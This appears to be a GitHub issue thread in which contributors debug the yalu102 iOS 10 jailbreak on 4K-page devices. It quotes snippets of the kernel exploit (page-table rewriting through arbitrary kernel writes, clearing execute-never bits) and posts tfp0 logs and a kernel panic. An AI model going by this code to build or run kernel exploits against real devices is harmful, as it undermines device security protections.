Is it possible if we can get an explanation on what defines a "4K device", "16k device", etc.?
After a quick google search, I have a feeling it might have to do with the size of the memory pages (http://stackoverflow.com/questions/21552747/strange-behavior-on-64bit-ios-devices-when-retrieving-vm-statistics/33574804)
/*
* page size -> used to know how many pages the ipc ports zone will use per block so we can guess task port addresses
*/
.....
int page_size = getpagesize();
.....
if (page_size == 0x1000) // running with 4k pages
.......
else if (page_size == 0x4000) // running with 16k pages
.....
Yes, 4K and 16K are memory pages per block of memory allocated to zones. Reading a comment and a few lines of code from Ian Beer's mach_portal (kernel_sploit.c) also explains what is meant by 4K and 16K and what it is used for.
Original article & code: https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c2
How are we supposed to debug a kernel panic on these devices?
Here's the device log for an attempted JB on an iP6:
Jan 26 15:51:01 Julians-iPhone yalu102[540] <Notice>: found corruption 38403
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: found kernel text at fffffff022c04000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: got tfp0 -> e07
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: found procs at fffffff004c56850
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __TEXT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __DATA_CONST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __TEXT_EXEC
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __KLD
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __LAST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __DATA
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_TEXT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_TEXT_EXEC
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_DATA
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_DATA_CONST
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PLK_LINKEDIT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __PRELINK_INFO
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: seg: __LINKEDIT
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: fffffff021ccc000 - fffffff023494000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: ffffffff03cd4000
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: fffffff022c715a0
Jan 26 15:51:08 Julians-iPhone yalu102[540] <Notice>: pmap: fffffff023120850
Could panic here: https://github.com/kpwn/yalu102/blob/master/yalu102/jailbreak.m#L266
Possibly change that to 0x1000?
@meyer9 I can test?
sure, but I'm just taking a wild guess here
alright, that helped I think?
2017-01-26 16:11:45.462718 yalu102[252:9458] debug: test point 1
2017-01-26 16:11:45.462881 yalu102[252:9458] debug: test point 2
2017-01-26 16:11:45.462966 yalu102[252:9458] debug: test point 3
2017-01-26 16:11:45.463140 yalu102[252:9458] debug: test point 4
2017-01-26 16:11:45.463253 yalu102[252:9458] debug: test point 5
2017-01-26 16:11:45.463326 yalu102[252:9458] debug: test point 6
2017-01-26 16:11:45.463387 yalu102[252:9458] debug: test point 7
2017-01-26 16:11:45.463568 yalu102[252:9458] got phys at 802dd2000 for virt fffffff00088f000
2017-01-26 16:11:45.463692 yalu102[252:9458] found cpu 0
2017-01-26 16:11:45.463725 yalu102[252:9458] found physz: fffffff012693000
2017-01-26 16:11:45.463806 yalu102[252:9458] found cpu 1
2017-01-26 16:11:45.463873 yalu102[252:9458] found physz: fffffff012693000
2017-01-26 16:11:45.463997 yalu102[252:9458] fffffff012793574 - fffffff0127933a8
2017-01-26 16:11:45.465377 yalu102[252:9458] ttbr0: 802ab9000 fffffff012671590
Still gets stuck though :P
It got further @meyer9
yeah
2017-01-26 16:19:00.212362 yalu102[222:4858] debug: test point 8
2017-01-26 16:19:00.212397 yalu102[222:4858] debug: test point 9
2017-01-26 16:19:00.212481 yalu102[222:4858] debug: test point 10
2017-01-26 16:19:00.212515 yalu102[222:4858] debug: test point 2
2017-01-26 16:19:00.213501 yalu102[222:4858] got a cpacr
https://github.com/kpwn/yalu102/pull/26#issuecomment-275486662
@meyer9 we need to fix what's causing corruption ;/ found corruption XXXXX
that's not normal?
I didn't think so, it might be? @meyer9
I believe it is. The problem stems from this function:
pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\
uint64_t tte = ReadAnywhere64(tte_addr);\
if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\
NSLog(@"breakup!");\
uint64_t fakep = physalloc(PSZ);\
uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\
TTE_SETB(tte, TTE_IS_TABLE_MASK);\
for (int i = 0; i < PSZ/8; i++) {\
TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\
WriteAnywhere64(fakep+i*8, tte);\
}\
TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\
WriteAnywhere64(tte_addr, tte);\
}\
uint64_t newt = physalloc(PSZ);\
copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\
copyout(newt, bbuf, PSZ);\
TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\
TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\
TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\
WriteAnywhere64(tte_addr, tte);\
NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\
}, level1_table, 2);
Doesn't look like an easy fix
I'm at the same place as you @meyer9
Check out pte_stuff
These possibly need adjusting?
typedef union VMA_4K {
struct {
uint64_t block_off : 12;
uint64_t level3_index : 9;
uint64_t level2_index : 9;
uint64_t level1_index : 9;
uint64_t level0_index : 9;
uint64_t ttbr_selector : 16;
} __attribute__((packed)) vm_info;
uint64_t vmaddr;
} VMA_4K;
Tell me if you get the correct values 👍
Just an afterthought: if those are the 16K device strings, or the same as them, won't the 4K values be a quarter of the 16K values?
Probably not since all of them aren't divisible by 4, but I have no clue
I'm guessing if it was an easy fix it would already have been added :p
Probably, but it's still fun to look
Yeah
Just leave a comment if you find / fix something else
If I put NSLog(@"calling back %llu %d", tteaddr, level); just before pagestuff_64_callback in pte_stuff.h, I get calling back 18446743970915550384 2. But it does not run the callback...
Can someone do this on a verified working JB and see what it gives them? The level may be different.
I've been trying to look for successful logs but haven't found them
I haven't tried this yet, and that's because I don't have a jailbreak working. Despite my lack of memory-management knowledge, I'll see if I can do anything.
I just forgot that I didn't plug in my iPhone yet. Also, @Mila432's latest commit does not support the TSMC iPhone 6s and SE (which has S8003 at the end, and not S8000).
Just tried to run the jailbreak. No output. Just a crash and reboot.
On what device?
I'd like someone to add that debug line I described above and paste the output on a working JB.
The iPhone 6.
Got it. That's pretty expected. We're looking for comparison with a different device.
I'll try to fix this problem. At the same time, I'll be trying to find a way to make this code a bit easier to read (and this is by using more "if" statements with u.machine to better define which set of offsets are for which device).
kernel panic:
panic(cpu 1 caller 0xfffffff01d3969e8): Kernel data abort. (saved state: 0xfffffff16943b350)
x0: 0xfffffff001e274d8 x1: 0xffffffe81b600748 x2: 0x0000000000000000 x3: 0xfffffff001e274d8
x4: 0xfffffff16943b838 x5: 0xfffffff16943b988 x6: 0x0000000010000003 x7: 0xfffffff004b4bf00
x8: 0xfffffff01d79a868 x9: 0xfffffff01d79a868 x10: 0xfffffff001e274d8 x11: 0xfffffff001e274d8
x12: 0xfffffff01d766380 x13: 0x00000000000014f9 x14: 0xaaaaaaaaaaaaaaab x15: 0x0000000000000018
x16: 0xfffffff01d748f10 x17: 0x0000000000000000 x18: 0x0000000000000000 x19: 0xfffffff11cd5a920
x20: 0x0000000000000008 x21: 0xfffffff001e274d8 x22: 0xffffffe81b600748 x23: 0x0000000000000020
x24: 0x0000000000000000 x25: 0xffffffe81b600750 x26: 0xffffffe81b600748 x27: 0x0000000000000001
x28: 0xfffffff16943b838 fp: 0xfffffff16943b6a0 lr: 0xfffffff01d32f9bc sp: 0xfffffff16943b6a0
pc: 0xfffffff01d28e034 cpsr: 0x60000304 esr: 0x96000004 far: 0xffffffe81b600748
Debugger message: panic
Memory ID: 0x1
OS version: 14C92
Kernel version: Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000
KernelCache UUID: E241E5E5848A662ECF7751CB6E36E94D
iBoot version: iBoot-3406.30.8
secure boot?: YES
Paniclog version: 6
Kernel slide: 0x0000000016200000
Kernel text base: 0xfffffff01d204000
Epoch Time: sec usec
Boot : 0x588a933b 0x000b0c5c
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x588a93ad 0x000729f0
Panicked task 0xfffffff00253a000: 8941 pages, 6 threads: pid 224: yalu102
Panicked thread: 0xfffffff002b534f0, backtrace: 0xfffffff16943af90
lr: 0xfffffff01d39bbc0 fp: 0xfffffff16943b000
lr: 0xfffffff01d2b6e70 fp: 0xfffffff16943b050
lr: 0xfffffff01d3969e8 fp: 0xfffffff16943b240
lr: 0xfffffff01d39709c fp: 0xfffffff16943b330
lr: 0xfffffff01d2901f0 fp: 0xfffffff16943b340
lr: 0xfffffff01d28e034 fp: 0xfffffff16943b6a0
lr: 0xfffffff01d32f9bc fp: 0xfffffff16943b6e0
lr: 0xfffffff01d33cf70 fp: 0xfffffff16943b820
lr: 0xfffffff01d365f20 fp: 0xfffffff16943b870
lr: 0xfffffff01d304f1c fp: 0xfffffff16943b8b0
lr: 0xfffffff01d29ef18 fp: 0xfffffff16943ba20
lr: 0xfffffff01d2af3c8 fp: 0xfffffff16943bad0
lr: 0xfffffff01d3983f0 fp: 0xfffffff16943bba0
lr: 0xfffffff01d396d0c fp: 0xfffffff16943bc90
lr: 0xfffffff01d2901f0 fp: 0xfffffff16943bca0
I can tell this is a kernel panic. What does the rest mean?
I believe they are the values of the registers?
Also, the tte_addr is thought to be ffffffe8110004b0 according to the callback where it fails.
I think we're looking at this wrong. It probably fails earlier and then only crashes later since there should be no reason it's crashing at that specific spot.
I'm not sure how to look at this. I only learned a little bit of memory management, but that was because I was learning how a buffer overflow works.
Quick question: How do I access the device logs?
When you run the app with XCode Open the Console
I'm getting no output from the console.
are you running from Xcode?
did you run the app with xcode and let it open automatically?
It's also in Impactor under Device > Watch Log
No. I set Xcode to not run the app automatically, but to wait for me to launch the app to start debugging.
same as me on my iPad Air 2,
sysname: Darwin nodename: Augustas-iPad-Air-2-Silver release: 16.3.0 version: Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001 machine: iPad5,3
2017-01-27 11:49:16.463734 yalu102[224:8076] found corruption 38303
2017-01-27 11:49:16.774413 yalu102[224:8076] found kernel text at fffffff008604000
2017-01-27 11:49:16.776410 yalu102[224:8076] got tfp0 -> 38403
2017-01-27 11:49:16.777854 yalu102[224:8076] found procs at fffffff10d428c18
2017-01-27 11:49:16.781215 yalu102[224:8076] seg: __TEXT
2017-01-27 11:49:16.781268 yalu102[224:8076] seg: __DATA_CONST
2017-01-27 11:49:16.781305 yalu102[224:8076] seg: __TEXT_EXEC
2017-01-27 11:49:16.781337 yalu102[224:8076] seg: __KLD
2017-01-27 11:49:16.781371 yalu102[224:8076] seg: __LAST
2017-01-27 11:49:16.781404 yalu102[224:8076] seg: __DATA
2017-01-27 11:49:16.781435 yalu102[224:8076] seg: __PRELINK_TEXT
2017-01-27 11:49:16.781484 yalu102[224:8076] seg: __PLK_TEXT_EXEC
2017-01-27 11:49:16.781518 yalu102[224:8076] seg: __PRELINK_DATA
2017-01-27 11:49:16.781548 yalu102[224:8076] seg: __PLK_DATA_CONST
2017-01-27 11:49:16.781578 yalu102[224:8076] seg: __PLK_LINKEDIT
2017-01-27 11:49:16.781610 yalu102[224:8076] seg: __PRELINK_INFO
2017-01-27 11:49:16.781640 yalu102[224:8076] seg: __LINKEDIT
2017-01-27 11:49:16.781666 yalu102[224:8076] fffffff007670000 - fffffff008ea0000
2017-01-27 11:49:16.815980 yalu102[224:8076] ffffffff045d0000
2017-01-27 11:49:16.852228 yalu102[224:8076] fffffff0086715a0
2017-01-27 11:49:16.887973 yalu102[224:8076] pmap: fffffff008b20850
2017-01-27 11:49:16.924006 yalu102[224:8076] got phys at 0 for virt fffffff1b7790000
2017-01-27 11:49:16.924117 yalu102[224:8076] found cpu 0
2017-01-27 11:49:16.924150 yalu102[224:8076] found physz: fffffff008693000
2017-01-27 11:49:16.924188 yalu102[224:8076] found cpu 1
2017-01-27 11:49:16.924218 yalu102[224:8076] found physz: fffffff008693000
2017-01-27 11:49:16.924255 yalu102[224:8076] found cpu 2
2017-01-27 11:49:16.924282 yalu102[224:8076] found physz: fffffff008693000
2017-01-27 11:49:16.924323 yalu102[224:8076] fffffff008793714 - fffffff008793548
2017-01-27 11:49:16.925590 yalu102[224:8076] ttbr0: 802ac5000 fffffff008671590
2017-01-27 11:49:16.926011 yalu102[224:8076] got a cpacr
Support needed for 4K devices (in more understandable terms, "old" devices).